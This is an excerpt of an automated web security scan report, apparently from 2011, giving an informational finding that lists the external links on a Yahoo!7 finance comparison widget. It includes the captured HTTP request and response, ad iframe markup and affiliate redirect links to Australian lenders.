Set-Cookie: pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!!!!%!?5%!%5XA1![:Z-!#gyo!(_lN~~~~~~=3rw7~~!#%s?!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!!NB!#%sB!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL!#,Uv!!E)$!%'Aq!2rc<!%vj1!!H<)!?5%!%5XA1!d1ny!#QKc!(3_Q~~~~~~=3rvk=6$@p!!.vL"; path=/; expires=Fri, 06-Sep-2013 14:15:40 GMT
Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: liday1=<9:^PN0FYb2Y=?5; path=/; expires=Thu, 08-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Wed, 07 Sep 2011 14:15:40 GMT
Pragma: no-cache
Content-Length: 1518
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(7227493);}
</script>
<IFRAME SRC="http://ad.au.doubleclick.net/adi/N799.Yahoo1/B4631682.16;sz=728x90;dcopt=rcl;mtfIFrameRequest=false;click=http://ad.yieldmanager.com/clk?3,eAGljFFPgzAAhP8QpbSFgRIfCowGHVMcSNhboTCIHTXSyfbvzWTZH.Be7rtL7hDxu5qvasFrgeuua5DrI4Jtm7Se89AYlu.7rusQl9jeyih5EdFn8cGyQO6YTf8U8svLQpTOV6iW9OZdfR1OJFgvDd3FDbrhPy0aGC1uHwmlhwXHpADvURLcz1l63rJYbllmbcrM2ZaJTvNYpiHqK5zgTd7Y-1x8pnl13h8L.Hof0ifD6LX-eoSQn8yxnSfzwnulzEYdoe7buZ005BDAmUNkYWS5HobzIEXD9QR4zUehRlCrw0mDTn2Dsf0ZpIS.7fRq9Q==,;ord=1315404940?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<NOSCRIPT>
...[SNIP]...
L.Hof0ifD6LX-eoSQn8yxnSfzwnulzEYdoe7buZ005BDAmUNkYWS5HobzIEXD9QR4zUehRlCrw0mDTn2Dsf0ZpIS.7fRq9Q==,http://ad.au.doubleclick.net/jump/N799.Yahoo1/B4631682.16;abr=!ie4;abr=!ie5;sz=728x90;ord=1315404940?"><IMG SRC="http://ad.au.doubleclick.net/ad/N799.Yahoo1/B4631682.16;abr=!ie4;abr=!ie5;sz=728x90;ord=1315404940?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Click Here"></A>
...[SNIP]...

14.25. http://au.pfinance.yahoo.com/compare/distribution/wan-widget/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://au.pfinance.yahoo.com
Path:	/compare/distribution/wan-widget/

Issue detail

The page was loaded from a URL containing a query string:

http://au.pfinance.yahoo.com/compare/distribution/wan-widget/?w=298

The response contains the following links to other domains:

http://l.yimg.com/ao/i/mp/js/loader/yuiloader.s1270.js
http://l.yimg.com/ao/i/mp/properties/genie/01/css/genie-widget.s1301.css
http://l.yimg.com/ao/i/mp/properties/genie/01/css/widget-infochoice.v1.2.css
http://l.yimg.com/ea/img/genie/101116/11594-16e3b79.jpg?x=65&y=50&q=90&sig=58SAqPwgxJ2FwjporXD1sw--
http://l.yimg.com/ea/img/genie/101116/12749-16e3b75.jpg?x=65&y=50&q=90&sig=EW0CH7YzbQdqpjrnw7YuKg--
http://l.yimg.com/ea/img/genie/101116/18484-16e3b7g.jpg?x=65&y=50&q=90&sig=kLH2ELGUa_aTXfFv9f3I6Q--
http://l.yimg.com/ea/img/genie/101116/611-16e3b7g.jpg?x=65&y=50&q=90&sig=Cimgs0gHsEh9trRiDybtag--
http://l.yimg.com/ea/img/genie/101116/617-16e3b7e.jpg?x=65&y=50&q=90&sig=xqSGR7e2CQn5hRvI2zmB2w--
http://l.yimg.com/ea/img/genie/101116/657-16e3b6t.jpg?x=65&y=50&q=90&sig=kyU74HUptnDkL99vOTNriQ--
http://l.yimg.com/ea/img/genie/110110/19647-16ikvft.jpg?x=65&y=50&q=90&sig=LRYU14cTdhymBLLhqWcHNw--
http://l.yimg.com/ea/img/genie/110301/18836-16motor.jpg?x=65&y=50&q=90&sig=JdicDpqN.1Z8GyTgbnE3nA--
http://l.yimg.com/ea/img/genielogos/110727/anz1-172unqd.jpg?x=65&y=50&q=90&sig=RRPSrJcwn5nNC.Fqf3rsiw--
http://l.yimg.com/ea/img/genielogos/110727/aussie_rgb_stacked_103_w-172unpu.jpg?x=65&y=50&q=90&sig=OQ3lTaKT4RX0TmkdjQ3ADw--
http://l.yimg.com/ea/img/genielogos/110727/citibank_logo_103x93-172unpv.gif?x=65&y=50&q=90&sig=Z0B4fAvcmWSNVEyaghguvg--
http://l.yimg.com/ea/img/genielogos/110727/cua-172unqb.jpg?x=65&y=50&q=90&sig=Y6AosooW32eF4AFgBhhXOQ--
http://l.yimg.com/ea/img/genielogos/110727/e_money-172unqe.png?x=65&y=50&q=90&sig=K8ujlgKob6hEi2UWGAFYnw--
http://l.yimg.com/ea/img/genielogos/110727/gbs1-172unqc.jpg?x=65&y=50&q=90&sig=0G6Tskn1uFx.Z2R_GPRWkQ--
http://l.yimg.com/ea/img/genielogos/110727/loans.com.au-172unqf.png?x=65&y=50&q=90&sig=dUwiVoDqak7Ryv3NLKk4Gw--
http://l.yimg.com/ea/img/genielogos/110727/macquaire_logo_large-172unpt.jpg?x=65&y=50&q=90&sig=p7IiCTmbAOJrNiOoAH0.0A--
http://l.yimg.com/ea/img/genielogos/110727/my_ratelogo_sizer-172unq2.gif?x=65&y=50&q=90&sig=C6arJkAi8jQ9cUPXZKjkmg--
http://l.yimg.com/ea/img/genielogos/110727/npb1-172unqa.jpg?x=65&y=50&q=90&sig=HZYEyeNvzl8k9mabY9.AKQ--
http://l.yimg.com/ea/img/genielogos/110727/raboplus-172unqc.jpg?x=65&y=50&q=90&sig=AXJU4rMRl_4ljAVBo9qkGg--
http://l.yimg.com/ea/img/genielogos/110727/semnab-172unqc.jpg?x=65&y=50&q=90&sig=Esna8g_wK5r7._pSE167CQ--
http://l.yimg.com/ea/img/genielogos/110727/superratelarge-172unq8.jpg?x=65&y=50&q=90&sig=xumBrfg08nzNNo8qeue_ow--
http://l.yimg.com/ea/img/genielogos/110727/ubanklarge-172unq8.jpg?x=65&y=50&q=90&sig=z31OpSHO.4cHwLWzv6A19g--
http://l.yimg.com/ea/img/genielogos/110727/virgin_logo_sizer-172unq6.jpg?x=65&y=50&q=90&sig=zVEVBG3abkXOwbdDdE7XbQ--
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=a&url=http%3a%2f%2fclk.atdmt.com%2fNOZ%2fgo%2f346334451%2fdirect%2f01%2f&PUB=809&BT=15&PRD=13411&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=a&url=http%3a%2f%2fwww.citibank.com.au%2fcardsoffer%2fCardsOnline%2flending%2f0110personalcredit.htm%3fCode%3dV1R3BHK3&PUB=809&BT=15&PRD=18433&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=a@hh&url=https%3a%2f%2fboq.cardservicesdirect.com.au%2fCardsOnline%2fLowRate%2f0311.htm%3fCode%3dY1C9BFX3&PUB=809&BT=15&PRD=12749&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=b@ab&url=http%3a%2f%2fadsfac.net%2flink.asp%3fcc%3dNK-007.101657.0%26clk%3d1%26creativeID%3d150171%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=16663&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=b@hi&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b219497065%3b42707359%3bt&PUB=809&BT=15&PRD=19647&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=b@hi&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b236773440%3b60381493%3bj&PUB=809&BT=15&PRD=18836&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=c@cb&url=http%3a%2f%2fwww.citibank.com.au%2fcardsoffer%2fCardsOnline%2f0110CPAnnFee.htm%3fCode%3dT1C3BYK3&PUB=809&BT=15&PRD=11594&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=c@fg&url=http%3a%2f%2fbs.serving-sys.com%2fBurstingPipe%2fadServer.bs%3fcn%3dtf%26c%3d20%26mc%3dclick%26pli%3d2913396%26PluID%3d0%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=18482&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=d@ae&url=http%3a%2f%2fbs.serving-sys.com%2fBurstingPipe%2fadServer.bs%3fcn%3dtf%26c%3d20%26mc%3dclick%26pli%3d1652134%26PluID%3d0%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=18484&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=d@bj&url=http%3a%2f%2fadsfac.net%2flink.asp%3fcc%3dUBA016.121879.0%26creativeID%3d172329&PUB=809&BT=15&PRD=14505&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=d@gf&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b222367757%3b46035231%3be&PUB=809&BT=15&PRD=6089&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b233006557%3b55110142%3bp&PUB=809&BT=15&PRD=13349&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b233006557%3b55110142%3bp&PUB=809&BT=15&PRD=13378&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e@bi&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b241397100%3b60898611%3bf&PUB=809&BT=15&PRD=617&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e@e&url=http%3a%2f%2fbs.serving-sys.com%2fBurstingPipe%2fadServer.bs%3fcn%3dtf%26c%3d20%26mc%3dclick%26pli%3d2969118%26PluID%3d0%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=18801&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e@ej&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b243134912%3b66834333%3be&PUB=809&BT=15&PRD=1519&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@dh&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b214149108%3b36030472%3bu&PUB=809&BT=15&PRD=10740&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=http%3a%2f%2fwww.emoney.net.au%2fhome-loans-fixed-rate-variable%2f&PUB=809&BT=15&PRD=19534&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=https%3a%2f%2fsecure.newcastlepermanent.com.au%2fonlineforms%2fhomeloan%2fCampaignRedirect.aspx%3fCampaignCode%3dInfochoiceHomeLoans&PUB=809&BT=15&PRD=2001&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=https%3a%2f%2fsecure.newcastlepermanent.com.au%2fonlineforms%2fhomeloan%2fCampaignRedirect.aspx%3fCampaignCode%3dInfochoiceHomeLoans&PUB=809&BT=15&PRD=2320&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=https%3a%2f%2fsecure.newcastlepermanent.com.au%2fonlineforms%2fhomeloan%2fCampaignRedirect.aspx%3fCampaignCode%3dInfochoiceHomeLoans&PUB=809&BT=15&PRD=2433&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@jc&url=http%3a%2f%2fwww.greater.com.au%2fHome-Loans%2f%3futm_source%3dInfoChoice%26utm_medium%3dcpc%26utm_campaign%3dIC%252BHomeLoans&PUB=809&BT=15&PRD=13141&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=g&url=https%3a%2f%2fwww.loans.com.au%2fPages%2fdream-loan-express-special-offer-apply-now.aspx&PUB=809&BT=15&PRD=20128&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=g@ab&url=http%3a%2f%2fadsfac.net%2flink.asp%3fcc%3dWCC019.108757.0%26clk%3d1%26creativeID%3d163518%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=657&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=g@e&url=http%3a%2f%2fwww.superrate.com.au%2fhome-loans%2fonline-enquiry%2f%3ftracker%3dAFF_Infochoice&PUB=809&BT=15&PRD=19598&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=h@eg&url=http%3a%2f%2fwww.bankmecu.com.au%2fborrowing%2fcredit-cards%2flow-rate-visa-credit-card.html%3f%26utm_source%3dInfochoice%26utm_medium%3dcomparisonsite%26utm_content%3dlow-rate-VISA-credit-card%26utm_campaign%3dcredit-card&PUB=809&BT=15&PRD=611&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=h@f&url=http%3a%2f%2fwww.bankmecu.com.au%2fborrowing%2fhome-loans%2fgogreen-home-loan.html%3f%26utm_source%3dInfochoice%26utm_medium%3dcomparisonsite%26utm_content%3dgoGreen-home-loan%26utm_campaign%3dhomeloan&PUB=809&BT=15&PRD=2357&LOC=-1&LOCE=Ws.LinkOuts
http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=h@fe&url=https%3a%2f%2fwww.myrate.com.au%2fenter-pre-approval%3fsc%3dl2%26a_id%3d1267&PUB=809&BT=15&PRD=2399&LOC=-1&LOCE=Ws.LinkOuts
http://yahoo.infochoice.com.au/banking/credit-card.aspx
http://yahoo.infochoice.com.au/banking/savings-account/list.aspx
http://yahoo.infochoice.com.au/home-loans/home-loan-interest-rates.aspx
http://yahoo.infochoice.com.au/personal-loans/list.aspx

Request

GET /compare/distribution/wan-widget/?w=298 HTTP/1.1
Host: au.pfinance.yahoo.com
Proxy-Connection: keep-alive
Referer: http://au.pfinance.yahoo.com/compare/distribution/wan-widget/?w=298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:01 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 19061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Moneyhound - wan widget - Yahoo!7</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="http://l.yimg.com/ao/i/mp/properties/genie/01/css/genie-widget.s1301.css" type="text/css" media="all">

<link rel="stylesheet" href="http://l.yimg.com/ao/i/mp/properties/genie/01/css/widget-infochoice.v1.2.css" type="text/css" media="all">

<meta name="robots" content="noindex,follow" />
...[SNIP]...
<li class="first"><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=h@eg&url=http%3a%2f%2fwww.bankmecu.com.au%2fborrowing%2fcredit-cards%2flow-rate-visa-credit-card.html%3f%26utm_source%3dInfochoice%26utm_medium%3dcomparisonsite%26utm_content%3dlow-rate-VISA-credit-card%26utm_campaign%3dcredit-card&PUB=809&BT=15&PRD=611&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/101116/611-16e3b7g.jpg?x=65&y=50&q=90&sig=Cimgs0gHsEh9trRiDybtag--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=c@cb&url=http%3a%2f%2fwww.citibank.com.au%2fcardsoffer%2fCardsOnline%2f0110CPAnnFee.htm%3fCode%3dT1C3BYK3&PUB=809&BT=15&PRD=11594&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/101116/11594-16e3b79.jpg?x=65&y=50&q=90&sig=58SAqPwgxJ2FwjporXD1sw--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=g@ab&url=http%3a%2f%2fadsfac.net%2flink.asp%3fcc%3dWCC019.108757.0%26clk%3d1%26creativeID%3d163518%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=657&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/101116/657-16e3b6t.jpg?x=65&y=50&q=90&sig=kyU74HUptnDkL99vOTNriQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=a@hh&url=https%3a%2f%2fboq.cardservicesdirect.com.au%2fCardsOnline%2fLowRate%2f0311.htm%3fCode%3dY1C9BFX3&PUB=809&BT=15&PRD=12749&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/101116/12749-16e3b75.jpg?x=65&y=50&q=90&sig=EW0CH7YzbQdqpjrnw7YuKg--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e@bi&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b241397100%3b60898611%3bf&PUB=809&BT=15&PRD=617&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/101116/617-16e3b7e.jpg?x=65&y=50&q=90&sig=xqSGR7e2CQn5hRvI2zmB2w--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=b@hi&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b219497065%3b42707359%3bt&PUB=809&BT=15&PRD=19647&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/110110/19647-16ikvft.jpg?x=65&y=50&q=90&sig=LRYU14cTdhymBLLhqWcHNw--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=b@hi&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b236773440%3b60381493%3bj&PUB=809&BT=15&PRD=18836&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/110301/18836-16motor.jpg?x=65&y=50&q=90&sig=JdicDpqN.1Z8GyTgbnE3nA--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=d@ae&url=http%3a%2f%2fbs.serving-sys.com%2fBurstingPipe%2fadServer.bs%3fcn%3dtf%26c%3d20%26mc%3dclick%26pli%3d1652134%26PluID%3d0%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=18484&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genie/101116/18484-16e3b7g.jpg?x=65&y=50&q=90&sig=kLH2ELGUa_aTXfFv9f3I6Q--"></span>
...[SNIP]...
<div class="ft"><a target="_blank" href="http://yahoo.infochoice.com.au/banking/credit-card.aspx">COMPARE MORE</a>
...[SNIP]...
<li class="first"><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=c@fg&url=http%3a%2f%2fbs.serving-sys.com%2fBurstingPipe%2fadServer.bs%3fcn%3dtf%26c%3d20%26mc%3dclick%26pli%3d2913396%26PluID%3d0%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=18482&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/virgin_logo_sizer-172unq6.jpg?x=65&y=50&q=90&sig=zVEVBG3abkXOwbdDdE7XbQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=d@bj&url=http%3a%2f%2fadsfac.net%2flink.asp%3fcc%3dUBA016.121879.0%26creativeID%3d172329&PUB=809&BT=15&PRD=14505&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/ubanklarge-172unq8.jpg?x=65&y=50&q=90&sig=z31OpSHO.4cHwLWzv6A19g--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=d@gf&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b222367757%3b46035231%3be&PUB=809&BT=15&PRD=6089&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/raboplus-172unqc.jpg?x=65&y=50&q=90&sig=AXJU4rMRl_4ljAVBo9qkGg--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=b@ab&url=http%3a%2f%2fadsfac.net%2flink.asp%3fcc%3dNK-007.101657.0%26clk%3d1%26creativeID%3d150171%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=16663&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/citibank_logo_103x93-172unpv.gif?x=65&y=50&q=90&sig=Z0B4fAvcmWSNVEyaghguvg--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@dh&url=http%3a%2f%2fad.au.doubleclick.net%2fclk%3b214149108%3b36030472%3bu&PUB=809&BT=15&PRD=10740&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/anz1-172unqd.jpg?x=65&y=50&q=90&sig=RRPSrJcwn5nNC.Fqf3rsiw--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=e@e&url=http%3a%2f%2fbs.serving-sys.com%2fBurstingPipe%2fadServer.bs%3fcn%3dtf%26c%3d20%26mc%3dclick%26pli%3d2969118%26PluID%3d0%26ord%3d%5btimestamp%5d&PUB=809&BT=15&PRD=18801&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/macquaire_logo_large-172unpt.jpg?x=65&y=50&q=90&sig=p7IiCTmbAOJrNiOoAH0.0A--"></span>
...[SNIP]...
<div class="ft"><a target="_blank" href="http://yahoo.infochoice.com.au/banking/savings-account/list.aspx">COMPARE MORE</a>
...[SNIP]...
<li class="first"><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=g&url=https%3a%2f%2fwww.loans.com.au%2fPages%2fdream-loan-express-special-offer-apply-now.aspx&PUB=809&BT=15&PRD=20128&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/loans.com.au-172unqf.png?x=65&y=50&q=90&sig=dUwiVoDqak7Ryv3NLKk4Gw--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=http%3a%2f%2fwww.emoney.net.au%2fhome-loans-fixed-rate-variable%2f&PUB=809&BT=15&PRD=19534&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/e_money-172unqe.png?x=65&y=50&q=90&sig=K8ujlgKob6hEi2UWGAFYnw--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=https%3a%2f%2fsecure.newcastlepermanent.com.au%2fonlineforms%2fhomeloan%2fCampaignRedirect.aspx%3fCampaignCode%3dInfochoiceHomeLoans&PUB=809&BT=15&PRD=2320&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/npb1-172unqa.jpg?x=65&y=50&q=90&sig=HZYEyeNvzl8k9mabY9.AKQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@jc&url=http%3a%2f%2fwww.greater.com.au%2fHome-Loans%2f%3futm_source%3dInfoChoice%26utm_medium%3dcpc%26utm_campaign%3dIC%252BHomeLoans&PUB=809&BT=15&PRD=13141&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/gbs1-172unqc.jpg?x=65&y=50&q=90&sig=0G6Tskn1uFx.Z2R_GPRWkQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=h@fe&url=https%3a%2f%2fwww.myrate.com.au%2fenter-pre-approval%3fsc%3dl2%26a_id%3d1267&PUB=809&BT=15&PRD=2399&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/my_ratelogo_sizer-172unq2.gif?x=65&y=50&q=90&sig=C6arJkAi8jQ9cUPXZKjkmg--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=g@e&url=http%3a%2f%2fwww.superrate.com.au%2fhome-loans%2fonline-enquiry%2f%3ftracker%3dAFF_Infochoice&PUB=809&BT=15&PRD=19598&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/superratelarge-172unq8.jpg?x=65&y=50&q=90&sig=xumBrfg08nzNNo8qeue_ow--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=a&url=http%3a%2f%2fclk.atdmt.com%2fNOZ%2fgo%2f346334451%2fdirect%2f01%2f&PUB=809&BT=15&PRD=13411&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/semnab-172unqc.jpg?x=65&y=50&q=90&sig=Esna8g_wK5r7._pSE167CQ--"></span>
...[SNIP]...
<li><a target="_blank" href="http://www.infochoice.com.au/visit-site-redirect.aspx?ichcode=f@f&url=https%3a%2f%2fsecure.newcastlepermanent.com.au%2fonlineforms%2fhomeloan%2fCampaignRedirect.aspx%3fCampaignCode%3dInfochoiceHomeLoans&PUB=809&BT=15&PRD=2001&LOC=-1&LOCE=Ws.LinkOuts"><span class="img"><img src="http://l.yimg.com/ea/img/genielogos/110727/npb1-172unqa.jpg?x=65&y=50&q=90&sig=HZYEyeNvzl8k9mabY9.AKQ--"></span>
...[SNIP]...
